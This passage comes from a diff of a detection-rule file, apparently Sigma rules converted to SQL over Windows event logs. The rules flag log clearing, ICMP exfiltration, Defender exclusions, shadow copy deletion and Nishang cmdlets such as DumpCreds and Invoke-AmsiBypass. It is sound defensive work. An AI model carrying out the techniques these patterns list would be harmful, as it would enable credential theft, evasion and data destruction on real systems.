"Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.t1562.001" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "status": "experimental", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.006" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare legitimate installation of kernel drivers via sc.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE 